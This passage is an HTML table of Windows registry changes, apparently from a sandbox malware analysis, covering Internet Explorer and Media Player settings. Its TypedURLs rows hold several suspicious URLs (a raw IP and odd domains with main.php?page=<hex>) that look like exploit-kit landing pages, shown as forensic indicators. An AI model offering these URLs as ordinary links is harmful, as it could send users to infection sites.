<td><span style="color: black; font-size: xx-small;">"{79376820-07D0-11CF-A24D-0020AFD79767}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">FilterData</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device</span></td>
<td><span style="color: black; font-size: xx-small;">DSGuid</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00000000-0000-0000-0000-000000000000}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy</span></td>
<td><span style="color: black; font-size: xx-small;">CleanCookies</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowClosedTabs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing</span></td>
<td><span style="color: black; font-size: xx-small;">NewTabPageShowActivities</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\CommandBar</span></td>
<td><span style="color: black; font-size: xx-small;">CompatibilityViewButtonBalloonCount</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{8CFA7582-04D2-11E2-A16C-08002765500A}</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Recovery\Active</span></td>
<td><span style="color: black; font-size: xx-small;">{E4F1361D-04D0-11E2-A16B-08002765500A}</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url1</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://46.249.59.116/main.php?page=5a56c997ffff2f79"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url2</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url3</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://ns8.ns360.info/main.php?page=f61d19dee2176c62"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url4</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://koqjhmmhcm.byinter.net/main.php?page=c9ee61ed42809775"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url5</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://urlquery.net/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url6</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://google.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url7</span></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://search.live.com/results.aspx?q=download+wireshark&src=IE-SearchBox&Form=IE8SRC"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url8</span></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
<td><span style="color: black; font-size: xx-small;">"http://www.oldversion.com/download.php?version=%2Fdownload-Java-Platform-Java-6-Update-29.html"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url9</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://oldversion.com/"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs</span></td>
<td><span style="color: black; font-size: xx-small;">url10</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"http://go.microsoft.com/fwlink/?LinkId=69157"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\DropDown</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Health</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{0890F930-4F80-4646-BAB1-4B6E5571FB89}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{1F32514F-1561-4922-A604-8A1F478B5A42}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{52903d79-f993-4de6-8317-20c9c176d823}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{59E7BF52-E5C9-4382-A39A-522DEE9AFDFD}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5DF031B7-6A37-42D9-8802-E27F4F224332}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{5F4BB5C9-4652-489B-8601-EEC0C3C32E2E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{7F2B1D6B-1357-402C-A1C8-67E59583B41D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{93075F62-16B3-43EC-A53B-FFAD0E01D5E7}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4}</span></td>
<td><span style="color: black; font-size: xx-small;">AttemptedAutoRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz</span></td>
<td><span style="color: black; font-size: xx-small;">Prefs</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"mute;False"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">InitFlags</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowHorizontalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">ShowVerticalSeparator</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">PlaylistHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">SettingsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000087</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataWidth</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000ba</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:000000a0</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying</span></td>
<td><span style="color: black; font-size: xx-small;">CaptionsHeight</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Player\Settings</span></td>
<td><span style="color: black; font-size: xx-small;">Client ID</span></td>
<td><span style="color: black; font-size: xx-small;">"{43209BE6-BD53-40A7-9DD3-50364635A3E4}"</span></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AcceptedPrivacyStatement</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">MetadataRetrieval</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SendUserGUID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">SilentAcquisition</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">UsageTracking</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">DisableMRU</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">LaunchIndex</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">AppColorLimited</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">FirstRun</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">X</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Y</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"10"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Width</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"686"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Height</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"536"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Maximized</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Volume</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000032</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeShuffle</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ModeLoop</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Mute</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">Balance</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectType</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Battery"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentEffectPreset</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VideoZoom</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000064</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShrinkToFit</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowEffects</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowFullScreenPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingQuickHide</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowTitles</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">ShowCaptions</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingPlaylist</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingMetadata</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">NowPlayingSettings</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">VizAutoSelect</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\MediaPlayer\Preferences</span></td>
<td><span style="color: black; font-size: xx-small;">CurrentDisplayView</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"VizView"</span></td>
</tr>
